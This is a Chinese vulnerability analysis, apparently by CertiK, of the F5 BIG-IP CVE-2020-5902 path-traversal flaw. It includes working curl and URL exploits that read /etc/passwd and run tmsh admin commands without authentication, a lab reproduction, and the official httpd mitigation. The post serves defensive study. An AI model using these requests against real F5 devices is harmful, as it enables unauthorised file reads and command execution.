值得信赖的区块链资讯!
CertiK:深度解析F5 BIG-IP远程代码执行漏洞

前言
今日一早,推特以及各大技术论坛上炸开了锅,安全圈子的人都在讨论F5设备里远程代码执行的漏洞。很多讨论的内容,大部分是在分享如何寻找目标,利用漏洞,并没有关于对漏洞成因的分析。CertiK的安全研究员下载了存在漏洞的程序,搭建环境复现漏洞后,对漏洞的起因进行了分析,并在下文分享给大家。
背景
F5 BIG-IP是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。Positive Technologies的研究人员Mikhail Klyuchnikov 发现其配置工具Traffic Management User Interface(TMUI)中存在远程代码执行漏洞,CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分,攻击者可利用该漏洞创建或删除文件,关闭服务、执行任意的系统命令,最终获得服务器的完全控制权。CVE具体表述请查看文章底部参考链接1。
受影响的BIG-IP软件版本
【15.0.0-15.1.0.3】【14.1.0-14.1.2.5】【13.1.0-13.1.3.3】【12.1.0-12.1.5.1】【11.6.1-11.6.5.1】
漏洞利用
读取任意文件:
curl-k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
远程执行tmsh命令:
curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
官方给出的临时修复方案(后文会对修复进行分析):

漏洞复现
在F5的官网注册账号之后,可以从F5的资源库中下载存在漏洞的BIG-IP软件。访问参考链接2可以下载BIG-IP TMOS(Traffic Management Operating System, 流量管理操作系统)的虚拟机镜像。CertiK技术团队因为使用Vmware Fusion, 下载的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-Image fileset for VMware ESX/i Server”。
在Vmware Fusion中加载镜像(import):

加载完成之后,使用默认用户名密码登陆系统:
用户名: root
密码: default
系统初始化之后,使用”ifconfig”命令查询虚拟机IP地址。CertiK技术团队的BIG-IP TMUI虚拟机IP地址为”172.16.4.137”。
在浏览器中访问BIG-IP TMUI登陆界面:
https://172.16.4.137/tmui/login.jsp

复现任意文件读取:
在浏览器中访问以下地址可以读取”/etc/passwd”文件内容:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

复现tmsh命令执行:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

漏洞分析
在进入漏洞分析前,先要明确一点:漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用户登陆后本身是可以被访问的。
下面的截图显示了登陆前和登陆后访问以下URL的区别:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
登陆前访问:

被跳转回登陆界面

输入账号密码登陆管理界面之后再访问,可执行fileRead.jsp读取文件。

fileRead.jsp和tmshCmd.jsp虽然是在PoC中最终被利用的文件,但是他们并不是漏洞的起因。此漏洞的本质是利用Apache和后台Java(tomcat)对URL的解析方式不同来绕过登陆限制, 在未授权的情况下,访问后台JSP模块。CertiK技术人员第一次注意到此类型漏洞是在2018年Orange的BlackHat演讲: “Breaking Parser Logic Take Your Path Normalization Off and Pop 0Days Out”. 这里可以查看演讲稿件(参考链接2)。
这里我们可以理解在F5 BIG-IP的后台服务器对收到了URL请求进行了两次的解析,第一次是httpd(Apache), 第二次是后一层的Java(tomcat).
在URL在第一次被Apache解析时,Apache关注的是URL的前半段
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
当Apache在看见前半段是合法URL且是允许被访问的页面时,就把它交给了后面的第二层。Apache在这里完全把URL里面关键的 /..;/ 给无视了。
在URL在第二次被解析时,后面的Java(tomcat)会把/..;/理解为,向上返回一层路径。此时, /login.jsp/ 和 /..;/ 会抵消掉。Tomcat看到的真正请求从
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
变成了:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
再来fileRead.jsp并没有对收到的请求进行身份验证,后台因此直接执行fileRead.jsp, 读取并返回了/etc/passwd文件的内容。
根据以上的思路,其实可以找出别的利用漏洞的URL, 比如:
https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
这里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一样,是一个不需要登陆就能访问的页面。但是因为要向上返回两次,需要用两个/..;/来抵消掉 ”/login/legal.html”。
回到开头提到的官方给出的临时修复方案, 修复方案的本质是在httpd的配置中添加以下规则:
include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
'
这个规则的意思是,当http服务器在监测到URL中包含..;(句号句号分号)的时候,直接返回404. 这样利用漏洞的请求就没办法到达后台(第二层)了。
如何避免漏洞:
此漏洞的利用方式在网络上公开之后,因为它的攻击成本低廉,大批黑客都开始图谋利用此漏洞攻击使用F5 BIG-IP产品的系统。黑客只需要付出极小的代价就能获得目标系统的控制权,对系统产生巨大的破坏。
俗话说:“不怕贼偷,就怕贼惦记”。即便这样的黑客攻击事件这次没有发生在你身上,不代表你是安全的。因为很有可能黑客的下一个目标就是你。
而Certik的专业技术团队会帮你彻底打消这种“贼惦记”的担忧。CertiK专业渗透测试团队会通过对此类事件的监测,第一时间给客户提交漏洞预警报告,帮助客户了解漏洞细节以及防护措施。此举可以确保客户的系统不受攻击并且不会遭受财产损失。
同时作为一名安全技术人员,在新漏洞被发现的时,不仅需要知道漏洞是如何被黑客利用的,更要去探寻漏洞背后的原因,方可积累经验,更加有能力在复杂的系统中发现隐藏的漏洞。
CertiK以及其技术人员,将永远把安全当做信仰,与大家一同学习并一同成长。
参考链接
1.https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
2.https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.0.0&container=Virtual-Edition
3.https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
来源:CertiK中文社区
比推快讯
更多 >>- 数据:1.62 万枚 SOL 从匿名地址转入 Fireblocks Custody,价值约 209 万美元
- 主流 Perp DEX 一览:市场行情影响各平台未平仓合约量下滑,Hyperliquid 交易量居首
- 数据:若 ETH 突破 3,258 美元,主流 CEX 累计空单清算强度将达 16.67 亿美元
- Circle 过去 7 天在 Solana 链上铸造 42.5 亿枚 USDC
- Wintermute::ETF 资金推动 BTC 突破 9.5 万美元,关税扰动引发回落但结构仍偏健康
- 数据:某巨鲸已从其 ETH 和 BTC 空单获利 700 万美元,并新开 XMR 空单以及加仓 BTC 空单
- 数据:某鲸鱼平仓 1004 枚 ETH 空单,盈利 3.2 万美元
- 2000 万波段猎手连续止盈 SOL 空单,短时减仓超 236 万美元
- 两鲸鱼地址共计向 Hyperliquid 存入超 1000 万美元做对手盘交易 ETH 合约
- Coinbase CEO 将出席世界经济论坛讨论市场结构和代币化问题
- 稳定币项目 Cap 联创:公募与 Stabledrop 公告后 Pendle APR 上升 30%
- 币安将调整投资组合保证金及 PM Pro 抵押率
- 韩国非法加密交易所负责人因洗钱获刑五年
- 数据:755.52 万枚 TRX 从 Binance 转出,价值约 231 万美元
- Cardone Capital 披露再次增持 1000 万美元的比特币
- 链上 HYPE 主力多头均陷深套,持仓榜首疑似 HYPE 上币内幕巨鲸浮亏 2130 万美元
- 数据:DOLO 涨超 20%,多个代币出现冲高回落
- 数据:200 万枚 AXS 从 Chainlink 转入 Binance,价值约 408 万美元
- 美元兑瑞郎跌破 0.79,日内跌幅达 0.84%
- 某巨鲸再次抛售 1000 枚 ETH,价值 419 万美元
- 先锋集团旗下基金 VVIAX 披露购入价值超 2 亿美元 Strategy 股票
- 以追涨杀跌闻名的巨鲸再次恐慌抛售 4000 枚 ETH
- 分析:以太坊正被悄然增持,系以现货为主导非杠杆驱动
- ZAMA 公售将于北京时间明日 16 时启动
- 纳斯达克 100 指数期货下跌 1.9%,触及一个月低点
- 纳斯达克 100 指数期货价格跌 2%
- PUMP 与 FARTCOIN 的主要多头已清仓离场,近日共遭清算规模达 3130 万美元
- 欧元兑美元日内涨幅扩大至 0.5%,现报 1.1704
- 数据:Machi 以太坊多头 25 倍杠杆遭部分清算,浮亏逾 100 万美元
- 麻吉合约累计亏损达 2360 万美元,25 倍 ETH 多单再次遭到强平
- 美元指数 DXY 跌至两周低点 98.65
- 两巨鲸于 HyperLiquid 分别建立 3118 万美元 ETH 多单与 1196 万美元 ETH 空单
- 分析师:当前卖方重新主导合约市场,现货买方力量不足难以有效支撑价格
- 数据:BSC 链上 Meme 币市值突破 500 万美元,短时拉涨超 120%
- 数据:ETH 当前全网 8 小时平均资金费率为 0.0039%
- OKX 将下架 ULTI、GEAR、VRA、DAO、CXT、RDNT、ELON 现货交易对
- 欧股主要股指开盘下挫
- 美元因美欧紧张局势走低,面临贬值风险
- 数据:期权指标表明比特币仍有下跌风险,到 6 月底有 30% 的概率跌破 8 万美元
- 某鲸鱼 25 倍杠杆做空 ETH,总头寸超 850 万美元
- 美银 1 月调查:全球投资者乐观情绪创 21 年 7 月以来新高,牛熊指标飙升至极度看涨区间
- Pendle 因采用率低弃用 vePENDLE,推 sPENDLE 简化治理
- 特朗普或将于 1 月底前公布新任美联储主席,美国或并未认真看待与欧盟的潜在贸易战问题
- Trove 代币上线后迅速崩盘,社区指控其 RUG PULL
- 现货黄金价格续创新高,现报 4717.58 美元/盎司
- JST 回购销毁累计超 3870 万美元
- 滚仓空头交易员五日内将 300 万美元做大至 1,000 万美元,当前持空单价值达 2.5 亿美元
- 某地址在近 5 日下跌行情中滚仓做空,现浮盈近 700 万美元
- Solana 手机 SKR 空投价值如何,明日 TGE 前瞻
- 多链 DeFi 执行引擎 Makina 遭遇攻击损失 510 万 USDC
比推专栏
更多 >>观点
比推热门文章
- Wintermute::ETF 资金推动 BTC 突破 9.5 万美元,关税扰动引发回落但结构仍偏健康
- 数据:某巨鲸已从其 ETH 和 BTC 空单获利 700 万美元,并新开 XMR 空单以及加仓 BTC 空单
- 数据:某鲸鱼平仓 1004 枚 ETH 空单,盈利 3.2 万美元
- 2000 万波段猎手连续止盈 SOL 空单,短时减仓超 236 万美元
- 两鲸鱼地址共计向 Hyperliquid 存入超 1000 万美元做对手盘交易 ETH 合约
- Coinbase CEO 将出席世界经济论坛讨论市场结构和代币化问题
- 稳定币项目 Cap 联创:公募与 Stabledrop 公告后 Pendle APR 上升 30%
- 币安将调整投资组合保证金及 PM Pro 抵押率
- 韩国非法加密交易所负责人因洗钱获刑五年
- 数据:755.52 万枚 TRX 从 Binance 转出,价值约 231 万美元
比推 APP



